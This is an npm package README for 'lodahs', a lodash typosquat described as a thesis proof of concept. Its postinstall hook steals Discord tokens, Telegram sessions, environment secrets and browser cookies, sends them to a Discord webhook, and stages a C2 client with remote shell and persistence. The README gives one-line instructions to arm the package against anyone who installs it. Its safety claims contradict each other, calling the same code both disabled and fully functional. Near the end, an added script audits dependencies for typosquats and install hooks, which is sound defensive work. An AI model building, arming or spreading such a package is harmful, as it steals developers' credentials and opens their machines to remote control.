mailcheckertestpoc
v1.0.0
Utility library for JavaScript (POC typosquat of lodash)
🔴 lodahs - Supply Chain Attack POC (Thesis Edition)
Status: COMPLETE C2 FRAMEWORK - SAFETY SWITCHES ACTIVE
This is the malicious npm package used in the Supply Chain Security thesis.
Quick Info
- Package Name: lodahs (typosquat of lodash)
- Type: Proof of Concept - Educational Supply Chain Attack
- Authorization: Thesis Advisor Approved
- Purpose: Demonstrating two-phase supply chain attack (Data Exfil + C2)
How It's Used
When installed via npm install:
npm install   # postinstall hook automatically triggers
# Phase 1 (ACTIVE):
# scripts/collect.js gathers:
#   - System information
#   - Discord tokens
#   - Telegram sessions
#   - Environment variables
#   - Browser cookies
#   → Sends to Discord webhook
# Phase 2 & 3 (DISABLED - code present):
# scripts/launcher.js would initialize C2 infrastructure
# (Python Server + Swift Client - currently commented out)

File Structure
lodahs/ ← 🔴 Malicious npm Package
├── package.json
│ └─ "postinstall": "node scripts/collect.js"
├── index.js ← Dummy lodash lookalike
│
├── scripts/ ← Attack Code (ACTIVE)
│ ├── collect.js [✅] Phase 1: Data exfiltration
│ ├── launcher.js [✅] Phase 2: C2 orchestrator
│ ├── server-launcher.js [✅] Phase 2: Python C2 Server
│ └── swift-client-launcher.js [✅] Phase 3: Swift C2 Client
│
├── payloads/ ← 🔑 Embedded Binaries (Realistic!)
│ ├── MacShellSwift [Precompiled Swift Binary]
│ ├── swiftshell-server.py [Python C2 Server]
│ ├── ca.pem [SSL Certificate]
│ └── ca.key [SSL Private Key]
│
├── README.md (this file)
├── C2-INTEGRATION.md (technical details)
├── THESIS-C2-COMPLETE.md (master documentation)
└── PRESENTATION-FLOW.md (step-by-step attack flow)

Code Status (Fully Functional, Safe Trigger)
✅ Phase 1 (Data Collection):
- Status: UNCOMMENTED - Functional
- Collects system info, credentials, tokens
- Sends to Discord webhook
✅ Phase 2 (C2 Server):
- Status: UNCOMMENTED - Functional
- Starts Python C2 Server on 127.0.0.1:443
- Awaits client connections
✅ Phase 3 (Swift Client):
- Status: UNCOMMENTED - Functional
- Compiles Swift binary (swift build)
- Connects to C2 Server
- Full remote command execution
Safety: Only the postinstall hook is disabled in package.json
- All code is functional and uncommented
- postinstall hook is set to _postinstall (inactive)
- To trigger attack: Just uncomment one line in package.json
For Your Thesis Presentation
When npm install runs in mailchecker:
cd mailchecker
npm install   # This will trigger lodahs postinstall
# What happens:
# [THESIS POC] Phase 1 (Data-Collection) abgeschlossen.
# [THESIS POC] ⚠️ Phase 2 & 3 (C2-Integration) sind für THESIS SAFETY deaktiviert.

Show your professor:
The active code:
cat scripts/collect.js   # Shows Phase 1 logic
The C2 infrastructure code:
cat scripts/launcher.js   # Orchestrator
cat scripts/server-launcher.js   # Python C2 server
cat scripts/swift-client-launcher.js   # Swift client
The documentation:
cat THESIS-C2-COMPLETE.md   # Master documentation
cat PRESENTATION-FLOW.md   # Complete attack timeline
What would be generated:
~/.supply-chain-poc/
├── macshell-config.json   # C2 configuration
├── c2-server-config.json   # Server config
├── swift-client-config.json   # Client config
└── STATUS.md   # Thesis summary
What Phase 1 Does (Active)
npm install lodahs
└─> postinstall hook
└─> scripts/collect.js
├─ Collects system info (hostname, user, IP, platform)
├─ Scans for Discord tokens (staged or real locations)
├─ Scans for Telegram sessions
├─ Extracts environment variables (AWS, Stripe keys, etc.)
├─ Enumerates browser cookies (Chrome, Brave, etc.)
└─ Sends all data to Discord webhook

What Phase 2+3 Would Do (If Activated)
scripts/launcher.js
├─ scripts/server-launcher.js
│ └─ Starts Python C2 server on 127.0.0.1:443
│ └─ Awaits client connections
│
└─ scripts/swift-client-launcher.js
├─ Compiles Swift binary (swift build)
├─ Launches Swift client
└─ Connects to C2 server
└─ Receives remote commands:
- systeminfo
- screenshot
- download files
- shell commands
- install persistence

Activation Instructions
⚠️ ALL CODE IS FUNCTIONAL. POSTINSTALL HOOK IS DISABLED.
To trigger full attack:
Simple: Just uncomment ONE line in package.json:
{
"scripts": {
"postinstall": "node scripts/collect.js", // ← Uncomment this
// "_postinstall": "node scripts/collect.js", // Currently disabled
}
}

That's it! Now when someone runs npm install, the complete attack chain triggers:
- Phase 1: Data collection (credentials, tokens, secrets)
- Phase 2: Python C2 Server starts on 127.0.0.1:443
- Phase 3: Swift Client compiles and connects to C2
All code is already uncommented and functional. Nothing else needs to be changed.
Key Points for Your Thesis
This POC demonstrates:
Supply Chain Attack Vector
- Typosquatting attack (lodahs vs lodash)
- npm postinstall hook exploitation
- Automatic execution without user interaction
Two-Phase Attack Strategy
- Phase 1: Data exfiltration (credentials, tokens, secrets)
- Phase 2+3: Remote command & control (C2 infrastructure)
Technical Implementation
- JavaScript for orchestration
- Python for C2 server
- Swift for client payload
- SSL/TLS encryption
Defense Mechanisms
- npm audit detection
- Lock file verification
- --ignore-scripts flag
- Network isolation
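The defense list above names the two signals a consumer of this package could have caught before anything ran: a name that is a near-miss of a popular package, and a lifecycle script that executes at install time. The following audit script is an added example for this README, not code from the lodahs package or its thesis documents. It walks a set of package.json manifests (constructed sample data here, standing in for the manifests under node_modules/ or the entries of a lock file), flags install-time hooks, and flags names within one edit (including an adjacent-letter swap such as lodahs/lodash) of a small constructed list of popular packages.

```javascript
// Added example (not part of the lodahs package): a defender-side audit of a
// dependency tree for the two signals this POC relies on, install-time
// lifecycle scripts and near-miss package names.

const POPULAR = ['lodash', 'express', 'react', 'axios', 'chalk']; // constructed list
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Optimal string alignment distance: Levenshtein plus adjacent transposition,
// so a swapped pair of letters (lodahs vs lodash) costs 1, not 2.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Returns the popular name this package name is suspiciously close to, or null.
// An exact match is the genuine package and is never flagged.
function typosquatOf(name, popular = POPULAR) {
  if (popular.includes(name)) return null;
  for (const p of popular) {
    if (editDistance(name, p) <= 1) return p;
  }
  return null;
}

// Returns the lifecycle scripts npm would run for this manifest during install.
function installScripts(manifest) {
  const scripts = manifest.scripts || {};
  return LIFECYCLE.filter((k) => typeof scripts[k] === 'string')
    .map((k) => ({ hook: k, command: scripts[k] }));
}

// Audits a list of parsed package.json objects and returns one finding per signal.
function auditManifests(manifests) {
  const findings = [];
  for (const m of manifests) {
    const near = typosquatOf(m.name);
    if (near) findings.push({ name: m.name, kind: 'typosquat', detail: `near-miss of ${near}` });
    for (const s of installScripts(m)) {
      findings.push({ name: m.name, kind: 'install-script', detail: `${s.hook}: ${s.command}` });
    }
  }
  return findings;
}

// Constructed sample tree: a genuine-looking dependency, the lookalike from
// this README with its postinstall hook, and a harmless package with no scripts.
const SAMPLE_MANIFESTS = [
  { name: 'express', version: '4.19.2', scripts: { test: 'mocha' } },
  { name: 'lodahs', version: '1.0.0', scripts: { postinstall: 'node scripts/collect.js' } },
  { name: 'leftpad', version: '0.0.1' },
];

console.log(JSON.stringify(auditManifests(SAMPLE_MANIFESTS), null, 2));
```

In a real pipeline the manifests come from reading node_modules/*/package.json after `npm ci --ignore-scripts` (or with `ignore-scripts=true` in .npmrc), so the audit runs before any hook is allowed to execute; the popular-name list should come from download statistics or an internal allow-list rather than the short constructed one above.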
Files Included
- collect.js - Phase 1 data collection (ACTIVE)
- launcher.js - Phase 2 orchestrator (DISABLED)
- server-launcher.js - Python C2 server launcher (DISABLED)
- swift-client-launcher.js - Swift client launcher (DISABLED)
- C2-INTEGRATION.md - Technical integration details
- THESIS-C2-COMPLETE.md - Complete documentation
- PRESENTATION-FLOW.md - Step-by-step attack flow
- index.js - Dummy module (makes it look like real lodash)
- README.md - This file
For Questions
Refer to:
- THESIS-C2-COMPLETE.md - Complete guide with timeline
- PRESENTATION-FLOW.md - Detailed attack flow with examples
- C2-INTEGRATION.md - Integration details
Status: Ready for Thesis Testing & Presentation
Safety: Code present, execution disabled via comments
Date: 2026-04-18
Advisor: Thesis Advisor Approved
